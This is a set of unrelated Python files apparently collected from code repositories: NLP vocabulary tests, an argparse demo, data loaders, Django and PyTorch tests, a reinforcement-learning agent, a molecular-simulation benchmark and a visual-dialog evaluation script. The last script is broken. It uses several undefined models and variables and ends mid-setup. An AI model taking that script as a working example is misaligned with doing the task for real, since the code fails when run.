'w': Counter(["This", "is", "a", "test", "sentence", '.']),
'w_m': Counter(['This', 'is', 'is']),
'w_nounk': Counter(['This', 'is']),
'w_nounk_nopad': Counter(['This', 'is', 'a'])}
vocab = Vocabulary(
counters=counters,
min_count={'w_m': 2},
pretrained_vocab=pretrained_vocabs,
intersection_vocab={'w2v': 'glove'},
no_pad_namespace={'glove_nounk_nopad', 'w_nounk_nopad'},
no_unk_namespace={
'glove_nounk', 'w_nounk', 'glove_nounk_nopad', 'w_nounk_nopad'})
# Test glove
print(vocab.get_vocab_size('glove'))
assert vocab.get_token_index('a', 'glove') == 2
assert vocab.get_token_index('c', 'glove') == 4
assert vocab.get_token_index('d', 'glove') == 0
# Test w2v
assert vocab.get_token_index('b', 'w2v') == 2
assert vocab.get_token_index('d', 'w2v') == 0
assert vocab.get_token_from_index(2, 'w2v') == 'b'
with pytest.raises(RuntimeError) as excinfo:
vocab.get_token_from_index(4, 'w2v')
assert excinfo.type == RuntimeError
# Test glove_nounk
assert vocab.get_token_index('a', 'glove_nounk') == 1
assert vocab.get_token_index('c', 'glove_nounk') == 3
with pytest.raises(RuntimeError) as excinfo:
vocab.get_token_index('d', 'glove_nounk')
assert excinfo.type == RuntimeError
# Test glove_nounk_nopad
assert vocab.get_token_index('a', 'glove_nounk_nopad') == 0
assert vocab.get_token_index('c', 'glove_nounk_nopad') == 2
with pytest.raises(RuntimeError) as excinfo:
vocab.get_token_index('d', 'glove_nounk_nopad')
assert excinfo.type == RuntimeError
# Test w
assert vocab.get_token_index('a', 'w') == 4
assert vocab.get_token_index('.', 'w') == 7
assert vocab.get_token_index('That', 'w') == 0
# Test w_m
assert vocab.get_token_index('is', 'w_m') == 2
assert vocab.get_token_index('This', 'w_m') == 0
assert vocab.get_token_index('That', 'w_m') == 0
# Test w_nounk
with pytest.raises(RuntimeError) as excinfo:
vocab.get_token_index('That', 'w_nounk')
assert excinfo.type == RuntimeError
assert vocab.get_token_index('This', 'w_nounk') == 1
# Test w_nounk_nopad
with pytest.raises(RuntimeError) as excinfo:
vocab.get_token_index('That', 'w_nounk_nopad')
assert excinfo.type == RuntimeError
assert vocab.get_token_index('This', 'w_nounk_nopad') == 0
|
11521445
|
import argparse
from datetime import datetime
from dateutil.parser import isoparse
def parse_args(arguments=[]):
"""Example of argparse with different inputs.
Args:
arguments (list): Arguments passed as a list of strings. This argument
can be used when calling the function from a
notebook. Alternatively when using the command line,
we don't need this variable.
Examples:
>>> cmd = 'AAA -ms BBB -si -l 1 2 3'
>>> args = parse_args(['AAA', '-ms', 'BBB', '-si', '-l', '1', '2', '3', '-d', '2020-01-06'])
Mandatory string: AAA
Mandatory string -ms: BBB
Store true -si: True
Input list ['1', '2', '3'], type: <class 'list'>
Default list [7, 77, 777], type: <class 'list'>
Date: 06/01/2020, 00:00:00
"""
parser = argparse.ArgumentParser(
description="Parser", formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
# here we can't put 'mandatory-string'
parser.add_argument(
"mandatory_string", type=str, help="Help mandatory string param"
)
parser.add_argument(
"-os",
"--opt-str",
type=str,
default="Optional string",
help="Help optional string",
)
parser.add_argument(
"-ms", "--mand-str", type=str, help="Help mandatory string", required=True
)
parser.add_argument("-i", "--int-param", type=int, default=7, help="Help int param")
parser.add_argument(
"-f", "--float-param", type=float, default=7.7, help="Help float param"
)
parser.add_argument(
"-si", "--me-gusta", action="store_true", help="Help for true parameter"
)
parser.add_argument(
"-no", "--no-me-gusta", action="store_false", help="Help false parameter"
)
parser.add_argument(
"-l",
"--list",
nargs="+",
help="List of arguments, ex: python argument_io.py -l 1 2 3",
)
parser.add_argument(
"-d",
"--date",
default=datetime.now().isoformat(),
type=isoparse,
help="Date for an event (format: YYYY-MM-DD)",
)
parser.set_defaults(my_list=[7, 77, 777], my_string="bazinga")
if arguments: # when calling from notebook
args = parser.parse_args(arguments)
else: # when calling from command line
args = parser.parse_args()
print("Mandatory string:", args.mandatory_string)
print("Mandatory string -ms:", args.mand_str)
print("Store true -si:", args.me_gusta)
print("Input list {}, type: {}".format(args.list, type(args.list)))
print("Default list {}, type: {}".format(args.my_list, type(args.my_list)))
print("Date: {}".format(args.date.strftime("%d/%m/%Y, %H:%M:%S")))
return args
if __name__ == "__main__":
parse_args()
|
11521484
|
import numpy as np
from scipy.io import loadmat
from collections import Counter
from keras.utils import to_categorical
from sklearn.model_selection import train_test_split
def mat2array():
data_mat = loadmat('Indian_pines_corrected.mat')
gt_mat = loadmat('Indian_pines_gt.mat')
data = data_mat['indian_pines_corrected'].astype(np.float32)
gt = gt_mat['indian_pines_gt']
for i in range(data.shape[-1]):
data[:,:,i] = (data[:,:,i] - np.mean(data[:,:,i])) / np.std(data[:,:,i])
return data, gt
def load_data():
data, gt = mat2array()
train_patches, train_patches_gt = load_patches(data, gt)
train_patches_synthetic, train_patches_gt_synthetic = load_synthetic_patches(data, gt)
train_patches = np.concatenate((train_patches, train_patches_synthetic), axis=0)
train_patches_gt = np.concatenate((train_patches_gt, train_patches_gt_synthetic), axis=0)
trainX, valX, trainY, valY = train_test_split(train_patches, train_patches_gt, test_size=0.25, random_state=42)
instances = dict(Counter(list(np.argmax(trainY, axis=3).ravel())))
total = sum(instances.values())
weights = np.log10([total/instances[i] for i in range(16)])
weights_dict = dict([(i, j) for i,j in enumerate(weights)])
return trainX, valX, trainY, valY, weights_dict
def load_patches(data, gt, patch_size = 4):
patches = []
patches_gt = []
for i in range(data.shape[0] - patch_size):
for j in range(data.shape[1] - patch_size):
patch = (data[i:i+patch_size, j:j+patch_size, :]).copy()
patch_gt = (gt[i:i+patch_size, j:j+patch_size]).copy()
if np.any(patch_gt == 0):
continue
else:
patches.append(patch)
patches_gt.append(patch_gt)
patches_1 = np.array(patches)
patches_gt = np.array(patches_gt) - 1
patches_gt_1 = to_categorical(patches_gt, num_classes = 16)
return patches_1, patches_gt_1
def load_synthetic_patches(data, gt, patch_size = 4, small_patch_size = 1, oversample = 12, label_choice = 8):
patches_small = [[] for _ in range(16)] #16 classes
patches_gt_small = [[] for _ in range(16)]
for i in range(data.shape[0] - small_patch_size):
for j in range(data.shape[1] - small_patch_size):
patch = (data[i:i+small_patch_size, j:j+small_patch_size, :]).copy()
patch_gt = (gt[i:i+small_patch_size, j:j+small_patch_size]).copy()
if np.any(patch_gt == 0):
continue
else:
index = patch_gt[0,0] - 1
patches_small[index].append(patch)
patches_gt_small[index].append(patch_gt)
patches_small = [np.array(patches_small[i]) for i in range(16)]
patches_gt_small = [(np.array(patches_gt_small[i]) - 1) for i in range(16)]
## Mixed patches
patches = []
patches_gt = []
for sample in range(int(oversample)):
new_patch = np.zeros((patch_size, patch_size, 200))
new_patch_gt = np.zeros((patch_size, patch_size))
for i in range(0, patch_size, small_patch_size):
for j in range(0, patch_size, small_patch_size):
index_choice = np.random.randint(int(len(patches_small[label_choice]) * 0.75))
new_patch[i:i+small_patch_size, j:j+small_patch_size, :] = patches_small[label_choice][index_choice]
new_patch_gt[i:i+small_patch_size, j:j+small_patch_size] = patches_gt_small[label_choice][index_choice]
patches.append(new_patch)
patches_gt.append(new_patch_gt)
patches = np.array(patches)
patches_gt = np.array(patches_gt)
patches_gt = to_categorical(patches_gt, num_classes=16)
return patches, patches_gt
|
11521509
|
from juliabox.jbox_util import gen_random_secret
from juliabox.db import JBPluginDB, JBoxDBItemNotFound
__author__ = 'barche'
class EmailVerifyDB(JBPluginDB):
provides = [JBPluginDB.JBP_TABLE_RDBMS]
NAME = 'jbox_email_verify'
TABLE = None
KEYS = ['user_id']
ATTRIBUTES = ['email', 'verification_code', 'is_verified']
SQL_INDEXES = None
KEYS_TYPES = [JBPluginDB.VCHAR]
TYPES = [JBPluginDB.VCHAR, JBPluginDB.VCHAR, JBPluginDB.INT]
def __init__(self, user_id):
count = self.query_count(user_id__eq=user_id)
create = (count == 0)
if create:
data = {
'user_id': user_id,
'email': '',
'verification_code': gen_random_secret(),
'is_verified': 0
}
self.create(data)
self.item = self.fetch(user_id=user_id)
self.is_new = create
def set_email(self, email):
self.set_attrib('email', email)
self.save()
def verify(self, verification_code):
if self.get_attrib('verification_code') == verification_code:
self.set_attrib('is_verified', 1)
self.save()
return True
return False
def get_code(self):
return self.get_attrib('verification_code')
def is_verified(self):
if self.get_attrib('is_verified') == 1:
return True
return False
|
11521517
|
import os
import sys
sys.path.append('/solution')
import matplotlib
import matplotlib as mlp
mlp.rcParams['font.family'] = u'NanumGothic'
mlp.rcParams['font.size'] = 10
import pandas as pd
pd.set_option('io.hdf.default_format', 'table') # default hdf format 'table'
from pandas import Series, DataFrame
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
sns.set_style('darkgrid', {'font.family': [u'NanumGothic']})
from wzdat.util import hdf_path, hdf_exists, get_notebook_rpath, get_notebook_dir
from wzdat.notebook_runner import NoDataFound
from wzdat.manifest import Manifest, ManifestNotExist
try:
nbrpath = __nbpath__ if '__nbpath__' in globals() else\
get_notebook_rpath(False)
nbapath = os.path.join(get_notebook_dir(), nbrpath)
manifest_ = Manifest(True, nbapath)
except ManifestNotExist:
manifest_ = None
import os
|
11521536
|
from setuptools import find_packages, setup
from setuptools.extension import Extension
with open('README.rst') as readme:
long_description = readme.read()
setup(
name='weighted_levenshtein',
version='0.2.1',
description=(
'Library providing functions to calculate Levenshtein distance, Optimal String Alignment distance, '
'and Damerau-Levenshtein distance, where the cost of each operation can be weighted by letter.'
),
long_description=long_description,
url='https://github.com/infoscout/weighted-levenshtein',
author='<NAME> (InfoScout)',
author_email='<EMAIL>',
license='MIT',
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: POSIX :: Linux',
'Programming Language :: Cython',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Text Processing :: Linguistic',
],
keywords='Levenshtein Damerau weight weighted distance',
test_suite='test.test',
packages=find_packages(exclude=('test', 'docs',)),
package_data={
'weighted_levenshtein': ['clev.pxd', 'clev.pyx'],
},
setup_requires=[
# Setuptools 18.0 properly handles Cython extensions.
'setuptools >= 18.0',
'cython',
],
ext_modules=[Extension("weighted_levenshtein.clev", ['weighted_levenshtein/clev.pyx'])],
)
|
11521559
|
from os import path
from django.contrib.auth.models import User
from django.test import TestCase
from django.urls import reverse
from files.models import CaptionedFile
fixture_dir = path.join(path.abspath(path.dirname(__file__)), 'fixtures')
class CaptionedFileTestCase(TestCase):
def setUp(self):
self.captioned_file = CaptionedFile.objects.create(
caption="this is a file",
publication=path.join('pubtest.txt')
)
self.captioned_file.save()
def test_creation(self):
cf = CaptionedFile.objects.create(
caption="lo lo",
publication=path.join('pubtest.txt')
)
cf.save()
self.assertEqual(CaptionedFile.objects.count(), 2)
# Cause setup created one already
def test_update(self):
self.captioned_file.caption = "I like text files"
self.captioned_file.save()
cf = CaptionedFile.objects.get()
self.assertEqual(cf.caption, "I like text files")
def test_delete(self):
cf = CaptionedFile.objects.get()
cf.delete()
self.assertEqual(CaptionedFile.objects.count(), 0)
class MultiEncodedAdminFormTest(TestCase):
def setUp(self):
self.user = User(
username='admin',
is_staff=True,
is_superuser=True)
self.user.set_password('<PASSWORD>')
self.user.save()
self.create_url = reverse('admin2:example3_captioned_file_create')
|
11521598
|
import sys
import os
from pathlib import Path
from appdirs import user_config_dir
from .version import Version
__all__ = ("__version__", "appdata", "cachepath", "cache", "lang", "theme")
__version__ = Version(180501)
appdata = user_config_dir('omnitool', "", roaming=True)
cachepath = os.path.join(appdata, "cache.dill")
##filled in by omnitool\__init__.py:
cache = None
lang = None
theme = None
exit_prog = None
cores = 1 # amount of cpu cores
##end of autofill
if getattr(sys, 'frozen', False):
datadir = Path(sys.executable).parent
else:
datadir = Path(__file__).parent
if False:
from .Language import english as lang # IDE hook
|
11521617
|
import torch
from mmaction.datasets import CutmixBlending, MixupBlending
def test_mixup():
alpha = 0.2
num_classes = 10
label = torch.randint(0, num_classes, (4, ))
mixup = MixupBlending(num_classes, alpha)
# NCHW imgs
imgs = torch.randn(4, 4, 3, 32, 32)
mixed_imgs, mixed_label = mixup(imgs, label)
assert mixed_imgs.shape == torch.Size((4, 4, 3, 32, 32))
assert mixed_label.shape == torch.Size((4, num_classes))
# NCTHW imgs
imgs = torch.randn(4, 4, 2, 3, 32, 32)
mixed_imgs, mixed_label = mixup(imgs, label)
assert mixed_imgs.shape == torch.Size((4, 4, 2, 3, 32, 32))
assert mixed_label.shape == torch.Size((4, num_classes))
def test_cutmix():
alpha = 0.2
num_classes = 10
label = torch.randint(0, num_classes, (4, ))
mixup = CutmixBlending(num_classes, alpha)
# NCHW imgs
imgs = torch.randn(4, 4, 3, 32, 32)
mixed_imgs, mixed_label = mixup(imgs, label)
assert mixed_imgs.shape == torch.Size((4, 4, 3, 32, 32))
assert mixed_label.shape == torch.Size((4, num_classes))
# NCTHW imgs
imgs = torch.randn(4, 4, 2, 3, 32, 32)
mixed_imgs, mixed_label = mixup(imgs, label)
assert mixed_imgs.shape == torch.Size((4, 4, 2, 3, 32, 32))
assert mixed_label.shape == torch.Size((4, num_classes))
|
11521619
|
import copy
import numpy as np
from sarsa import Sarsa
class DoubleQLearning(Sarsa):
def __init__(self, env, step_size=0.1, gamma=1, eps=0.1, pol_deriv=None):
super().__init__(env, step_size, gamma, eps, pol_deriv)
self.greedy_pol = self.eps_gre(eps=0)
self.reset()
print(f"gamma={self.gamma}")
print(f"eps={eps}")
print(f"step_size={self.step_size}")
def double_q_learning_update(self, s, a, r, s_p):
Q_1, Q_2 = self.Q_l if np.random.random() < 0.5 else self.Q_l[::-1]
a_max_Q_1 = self.best_action(self.env.moves_d[s_p], np.array([Q_1[(s_p, a)] for a in self.env.moves_d[s_p]]))
Q_1[(s, a)] += self.step_size * (r + self.gamma * Q_2[(s_p, a_max_Q_1)] - Q_1[(s, a)])
def double_q_learning_log_actions(self, n_episodes, to_log_s, to_log_a):
per_l = []
for ep_nb in range(n_episodes):
s = self.env.reset()
nb_a, nb_s = 0, 0
while True:
a = self.pol_deriv(s)
s_p, r, d, _ = self.env.step(a)
nb_s += (s == to_log_s)
nb_a += (a == to_log_a) * (s == to_log_s)
self.double_q_learning_update(s, a, r, s_p)
self.update_Q(s, a)
if d:
per_l.append(100 * (nb_a / nb_s))
break
s = s_p
return per_l
def update_Q(self, s, a):
self.Q[(s, a)] = sum(Q[(s, a)] for Q in self.Q_l)
def reset(self):
super().reset()
self.Q_l = [copy.deepcopy(self.Q) for _ in range(2)]
|
11521638
|
from diplomas.services.diploma_generator import DiplomaGenerator
from diplomas.services.diploma_regenerator import DiplomaRegenerator
__all__ = [
'DiplomaGenerator',
'DiplomaRegenerator',
]
|
11521687
|
from simtk import unit
import sys
import numpy as np
import matplotlib as mpl
mpl.use('Agg')
from openmmtools.constants import kB
import matplotlib.pyplot as plt
################################################################################
# NUMBER OF ATTEMPTS
################################################################################
nequil = 10
niterations = 200
use_sterics = False
ENV = 'vacuum'
################################################################################
# CONSTANTS
################################################################################
temperature = 300.0 * unit.kelvin
kT = kB * temperature
beta = 1.0/kT
functions_hybrid = {
'lambda_sterics' : 'lambda',
'lambda_electrostatics' : 'lambda',
'lambda_bonds' : 'lambda',
'lambda_angles' : 'lambda',
'lambda_torsions' : 'lambda',
}
functions_twostage = {
'lambda_sterics' : '(2*lambda)^(1./6.) * step(0.5 - lambda) + (1.0 - step(0.5 - lambda))',
'lambda_electrostatics' : '2*(lambda - 0.5) * step(lambda - 0.5)',
'lambda_bonds' : '1.0',
'lambda_angles' : '1.0',
'lambda_torsions' : '1.0'
}
def plot_logPs(logps, molecule_name, scheme, component):
"""
Create line plot of mean and standard deviation of given logPs.
Parameters
----------
logps: dict { int : np.ndarray }
key : number of total NCMC steps
value : array of `niterations` logP values
molecule_name : str
The molecule featured in the NullTestSystem being analyzed
in ['naphthalene','butane','propane']
scheme : str
Which NCMC scheme is being used
in ['hybrid','two-stage']
component : str
Which logP is being plotted
in ['NCMC','EXEN']
"""
x = list(logps.keys())
x.sort()
y = [logps[steps].mean() for steps in x]
dy = [logps[steps].std() for steps in x]
plt.fill_between(x, [mean - dev for mean, dev in zip(y, dy)], [mean + dev for mean, dev in zip(y, dy)])
plt.plot(x, y, 'k')
plt.xscale('log')
plt.title("{0} {1} {2} {3}".format(ENV, molecule_name, scheme, component))
plt.ylabel('logP')
plt.xlabel('ncmc steps')
plt.tight_layout()
plt.savefig('{0}_{1}_{2}{3}_logP'.format(ENV, molecule_name, scheme, component))
print('Saved plot to {0}_{1}_{2}{3}_logP.png'.format(ENV, molecule_name, scheme, component))
plt.clf()
def benchmark_exen_ncmc_protocol(analyses, molecule_name, scheme):
"""
For each combination of system and scheme, results are analyzed for
the following:
* Over the whole range of total steps:
* Plot mean and standard deviation of NCMC logP as a function of
total steps
* Plot mean and standard deviation of EXEN logP as a function of
total steps
Parameters
----------
analyses : dict { int : perses.Analysis }
key : number of total NCMC steps
value : analysis object contained stored information
molecule_name : str
The molecule featured in the NullTestSystem being analyzed
in ['naphthalene','butane','propane']
scheme : str
Which NCMC scheme is being used
in ['hybrid','two-stage']
Creates 2 plots every time it is called
"""
# Build a list of all logP components:
components = dict()
for nsteps, analysis in analyses.items():
ee_sam = analysis._ncfile.groups['ExpandedEnsembleSampler']
for name in ee_sam.variables.keys():
if name.startswith('logP_'):
components[name] = name
for component in components.keys():
try:
print('Finding {0} over nsteps for {1} with {2} NCMC'.format(component, molecule_name, scheme))
logps = dict()
for nsteps, analysis in analyses.items():
ee_sam = analysis._ncfile.groups['ExpandedEnsembleSampler']
niterations = ee_sam.variables[component].shape[0]
logps[nsteps] = np.zeros(niterations, np.float64)
for n in range(niterations):
logps[nsteps][n] = ee_sam.variables[component][n]
plot_logPs(logps, molecule_name, scheme, components[component])
except Exception as e:
print(e)
def benchmark_ncmc_work_during_protocol():
"""
Run 50 iterations of ExpandedEnsembleSampler for NullTestSystems
over a range of total NCMC steps [0, 1, 10, 100, 1000, 10000].
Benchmark is repeated for Naphthalene, Butane, and Propane test
systems, using two-stage and hybrid NCMC.
For each combination of system and scheme, results are analyzed for
the following:
* For a given total number of steps:
* For NCMC steps 100 and above, plot work done by ncmc integrator
over the course of the protocol
* Plot histograms of the contributions of each component to the
overall log acceptance probability
* Over the whole range of total steps:
* Plot mean and standard deviation of NCMC logP as a function of
total steps
* Plot mean and standard deviation of EXEN logP as a function of
total steps
"""
from perses.tests.testsystems import ButaneTestSystem
from perses.analysis import Analysis
molecule_names = {
#'propane' : PropaneTestSystem,
'butane' : ButaneTestSystem,
#'naphthalene' : NaphthaleneTestSystem,
}
methods = {
'hybrid' : ['geometry-ncmc-geometry', functions_hybrid],
'two-stage' : ['ncmc-geometry-ncmc', functions_twostage],
}
for molecule_name, NullProposal in molecule_names.items():
print('\nNow testing {0} null transformations'.format(molecule_name))
for name, [scheme, functions] in methods.items():
analyses = dict()
#for ncmc_nsteps in [0, 1, 10, 100, 1000, 10000]:
for ncmc_nsteps in [0, 1, 10, 100, 1000]:
print('Running {0} {2} ExpandedEnsemble steps for {1} iterations'.format(ncmc_nsteps, niterations, name))
testsystem = NullProposal(storage_filename='{0}_{1}-{2}steps.nc'.format(molecule_name, name, ncmc_nsteps), scheme=scheme, options={'functions' : functions, 'nsteps' : ncmc_nsteps})
testsystem.exen_samplers[ENV].geometry_engine.use_sterics = use_sterics
testsystem.mcmc_samplers[ENV].verbose = True
testsystem.exen_samplers[ENV].verbose = True
testsystem.mcmc_samplers[ENV].timestep = 1.0 * unit.femtoseconds
# DEBUG
#testsystem.exen_samplers[ENV].geometry_engine.write_proposal_pdb = True
#testsystem.exen_samplers[ENV].geometry_engine.pdb_filename_prefix = '{0}_{1}-{2}steps'.format(molecule_name, name, ncmc_nsteps)
# Equilibrate
# WARNING: We can't equilibrate because it messes up the iteration counters and storage iterations for exen samplers
#print('Equilibration...')
#testsystem.mcmc_samplers[ENV].run(niterations=nequil)
# Collect data on switching
print('Production...')
testsystem.exen_samplers[ENV].run(niterations=niterations)
analysis = Analysis(testsystem.storage_filename)
print(analysis.get_environments())
if ncmc_nsteps > 9:
analysis.plot_ncmc_work('{0}_{1}-ncmc_work_over_{2}_steps.pdf'.format(molecule_name, name, ncmc_nsteps))
analysis.plot_exen_logp_components()
analyses[ncmc_nsteps] = analysis
benchmark_exen_ncmc_protocol(analyses, molecule_name, name)
if __name__ == "__main__":
benchmark_ncmc_work_during_protocol()
|
11521694
|
from __future__ import print_function
import argparse
import os
import random
import sys
sys.path.append(os.getcwd())
import pdb
import time
import numpy as np
import json
import progressbar
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.nn.parallel
import torch.backends.cudnn as cudnn
import torch.optim as optim
import torch.utils.data
import torchvision.transforms as transforms
import torchvision.utils as vutils
from torch.autograd import Variable
from misc.utils import repackage_hidden, clip_gradient, adjust_learning_rate, \
decode_txt, sample_batch_neg, l2_norm
import misc.dataLoader as dl
import misc.model as model
from misc.encoder_QIH import _netE
import datetime
from misc.netG import _netG
parser = argparse.ArgumentParser()
parser.add_argument('--data_dir', default='', help='folder to output images and model checkpoints')
parser.add_argument('--input_img_h5', default='vdl_img_vgg.h5', help='')
parser.add_argument('--input_ques_h5', default='visdial_data.h5', help='visdial_data.h5')
parser.add_argument('--input_json', default='visdial_params.json', help='visdial_params.json')
parser.add_argument('--model_path', default='', help='folder to output images and model checkpoints')
parser.add_argument('--cuda' , action='store_true', help='enables cuda')
opt = parser.parse_args()
print(opt)
opt.manualSeed = 111 #random.randint(1, 10000) # fix seed
print("Random Seed: ", opt.manualSeed)
random.seed(opt.manualSeed)
torch.manual_seed(opt.manualSeed)
np.random.seed(opt.manualSeed)
if opt.cuda:
torch.cuda.manual_seed(opt.manualSeed)
cudnn.benchmark = True
if torch.cuda.is_available() and not opt.cuda:
print("WARNING: You have a CUDA device, so you should probably run with --cuda")
####################################################################################
# Data Loader
####################################################################################
if opt.model_path != '':
print("=> loading checkpoint '{}'".format(opt.model_path))
checkpoint = torch.load(opt.model_path)
model_path = opt.model_path
data_dir = opt.data_dir
input_img_h5 = opt.input_img_h5
input_ques_h5 = opt.input_ques_h5
input_json = opt.input_json
opt = checkpoint['opt']
opt.start_epoch = checkpoint['epoch']
opt.batchSize = 5
opt.data_dir = data_dir
opt.model_path = model_path
input_img_h5 = os.path.join(opt.data_dir, opt.input_img_h5)
input_ques_h5 = os.path.join(opt.data_dir, opt.input_ques_h5)
input_json = os.path.join(opt.data_dir, opt.input_json)
dataset_val = dl.validate(input_img_h5=input_img_h5, input_ques_h5=input_ques_h5,
input_json=input_json, negative_sample = opt.negative_sample,
num_val = opt.num_val, data_split = 'test')
dataloader_val = torch.utils.data.DataLoader(dataset_val, batch_size=30,
shuffle=False, num_workers=int(opt.workers))
####################################################################################
# Build the Model
####################################################################################
vocab_size = dataset_val.vocab_size
ques_length = dataset_val.ques_length
ans_length = dataset_val.ans_length + 1
his_length = dataset_val.ans_length + dataset_val.ques_length
itow = dataset_val.itow
img_feat_size = 512
print('init Generative model...')
netE_g = _netE(opt.model, opt.ninp, opt.nhid, opt.nlayers, opt.dropout, img_feat_size)
netW_g = model._netW(vocab_size, opt.ninp, opt.dropout)
netG = _netG(opt.model, vocab_size, opt.ninp, opt.nhid, opt.nlayers, opt.dropout)
sampler = model.gumbel_sampler()
critG = model.G_loss(opt.ninp)
critLM = model.LMCriterion()
if opt.model_path_G != '':
print('Loading Generative model...')
netW_g.load_state_dict(checkpoint_G['netW_g'])
netE_g.load_state_dict(checkpoint_G['netE_g'])
netG.load_state_dict(checkpoint_G['netG'])
if opt.cuda: # ship to cuda, if has GPU
netW_g.cuda()
netE_g.cuda()
netG.cuda()
critG.cuda()
sampler.cuda()
critLM.cuda()
####################################################################################
# training model
####################################################################################
def val():
netE_g.eval()
netW_g.eval()
netG.eval()
n_neg = 100
ques_hidden1 = netE_g.init_hidden(opt.batchSize)
hist_hidden2 = netE_g.init_hidden(opt.batchSize)
data_iter_val = iter(dataloader_val)
count = 0
i = 0
rank_G = []
while i < len(dataloader_val):
data = data_iter_val.next()
image, history, question, answer, answerT, questionL, opt_answer, \
opt_answerT, answer_ids, answerLen, opt_answerLen, img_id = data
batch_size = question.size(0)
image = image.view(-1, 512)
img_input.data.resize_(image.size()).copy_(image)
for rnd in range(10):
# get the corresponding round QA and history.
ques = question[:,rnd,:].t()
his = history[:,:rnd+1,:].clone().view(-1, his_length).t()
opt_ans = opt_answer[:,rnd,:,:].clone().view(-1, ans_length).t()
opt_tans = opt_answerT[:,rnd,:].clone().view(-1, ans_length).t()
gt_id = answer_ids[:,rnd]
opt_len = opt_answerLen[:,rnd,:].clone().view(-1)
ques_input.data.resize_(ques.size()).copy_(ques)
his_input.data.resize_(his.size()).copy_(his)
opt_ans_input.data.resize_(opt_ans.size()).copy_(opt_ans)
opt_ans_target.data.resize_(opt_tans.size()).copy_(opt_tans)
gt_index.data.resize_(gt_id.size()).copy_(gt_id)
ques_emb_g = netW_g(ques_input, format = 'index')
his_emb_g = netW_g(his_input, format = 'index')
ques_emb_d = netW_d(ques_input, format = 'index')
his_emb_d = netW_d(his_input, format = 'index')
ques_hidden1 = repackage_hidden(ques_hidden1, batch_size)
ques_hidden2 = repackage_hidden(ques_hidden2, batch_size)
hist_hidden1 = repackage_hidden(hist_hidden1, his_emb_g.size(1))
hist_hidden2 = repackage_hidden(hist_hidden2, his_emb_d.size(1))
featG, ques_hidden1 = netE_g(ques_emb_g, his_emb_g, img_input, \
ques_hidden1, hist_hidden1, rnd+1)
featD, _ = netE_d(ques_emb_d, his_emb_d, img_input, \
ques_hidden2, hist_hidden2, rnd+1)
#featD = l2_norm(featD)
_, ques_hidden1 = netG(featG.view(1,-1,opt.ninp), ques_hidden1)
hidden_replicated = []
for hid in ques_hidden1:
hidden_replicated.append(hid.view(opt.nlayers, batch_size, 1, \
opt.nhid).expand(opt.nlayers, batch_size, 100, opt.nhid).clone().view(opt.nlayers, -1, opt.nhid))
hidden_replicated = tuple(hidden_replicated)
ans_emb = netW_g(opt_ans_input, format = 'index')
output, _ = netG(ans_emb, hidden_replicated)
logprob = - output
logprob_select = torch.gather(logprob, 1, opt_ans_target.view(-1,1))
mask = opt_ans_target.data.eq(0) # generate the mask
if isinstance(logprob, Variable):
mask = Variable(mask, volatile=logprob.volatile)
logprob_select.masked_fill_(mask.view_as(logprob_select), 0)
prob = logprob_select.view(ans_length, -1, 100).sum(0).view(-1,100)
for b in range(batch_size):
gt_index.data[b] = gt_index.data[b] + b*100
gt_score = prob.view(-1).index_select(0, gt_index)
sort_score, sort_idx = torch.sort(prob, 1)
count = sort_score.lt(gt_score.view(-1,1).expand_as(sort_score))
rank = count.sum(1) + 1
rank_G += list(rank.view(-1).data.cpu().numpy())
opt_ans_emb = netW_d(opt_ans_target, format = 'index')
opt_hidden = repackage_hidden(opt_hidden, opt_ans_target.size(1))
opt_feat = netD(opt_ans_emb, opt_ans_target, opt_hidden, vocab_size)
opt_feat = opt_feat.view(batch_size, -1, opt.ninp)
#ans_emb = ans_emb.view(ans_length, -1, 100, opt.nhid)
featD = featD.view(-1, opt.ninp, 1)
score = torch.bmm(opt_feat, featD)
score = score.view(-1, 100)
gt_score = score.view(-1).index_select(0, gt_index)
sort_score, sort_idx = torch.sort(score, 1, descending=True)
count = sort_score.gt(gt_score.view(-1,1).expand_as(sort_score))
rank = count.sum(1) + 1
rank_D += list(rank.view(-1).data.cpu().numpy())
i += 1
if i % 50 == 0:
R1 = np.sum(np.array(rank_G)==1) / float(len(rank_G))
R5 = np.sum(np.array(rank_G)<=5) / float(len(rank_G))
R10 = np.sum(np.array(rank_G)<=10) / float(len(rank_G))
ave = np.sum(np.array(rank_G)) / float(len(rank_G))
mrr = np.sum(1/(np.array(rank_G, dtype='float'))) / float(len(rank_G))
print ('%d/%d: mrr: %f R1: %f R5 %f R10 %f Mean %f' %(1, len(dataloader_val), mrr, R1, R5, R10, ave))
return rank_G, rank_D
####################################################################################
# Main
####################################################################################
img_input = torch.FloatTensor(opt.batchSize)
ques_input = torch.LongTensor(ques_length, opt.batchSize)
his_input = torch.LongTensor(his_length, opt.batchSize)
# answer input
ans_input = torch.LongTensor(ans_length, opt.batchSize)
ans_target = torch.LongTensor(ans_length, opt.batchSize)
wrong_ans_input = torch.LongTensor(ans_length, opt.batchSize)
sample_ans_input = torch.LongTensor(1, opt.batchSize)
fake_len = torch.LongTensor(opt.batchSize)
fake_diff_mask = torch.ByteTensor(opt.batchSize)
fake_mask = torch.ByteTensor(opt.batchSize)
# answer len
batch_sample_idx = torch.LongTensor(opt.batchSize)
# noise
noise_input = torch.FloatTensor(opt.batchSize)
# for evaluation:
opt_ans_input = torch.LongTensor(opt.batchSize)
gt_index = torch.LongTensor(opt.batchSize)
opt_ans_target = torch.LongTensor(opt.batchSize)
if opt.cuda:
ques_input, his_input, img_input = ques_input.cuda(), his_input.cuda(), img_input.cuda()
ans_input, ans_target = ans_input.cuda(), ans_target.cuda()
wrong_ans_input = wrong_ans_input.cuda()
sample_ans_input = sample_ans_input.cuda()
fake_len = fake_len.cuda()
noise_input = noise_input.cuda()
batch_sample_idx = batch_sample_idx.cuda()
fake_diff_mask = fake_diff_mask.cuda()
fake_mask = fake_mask.cuda()
opt_ans_input = opt_ans_input.cuda()
gt_index = gt_index.cuda()
opt_ans_target = opt_ans_target.cuda()
ques_input = Variable(ques_input)
img_input = Variable(img_input)
his_input = Variable(his_input)
ans_input = Variable(ans_input)
ans_target = Variable(ans_target)
wrong_ans_input = Variable(wrong_ans_input)
sample_ans_input = Variable(sample_ans_input)
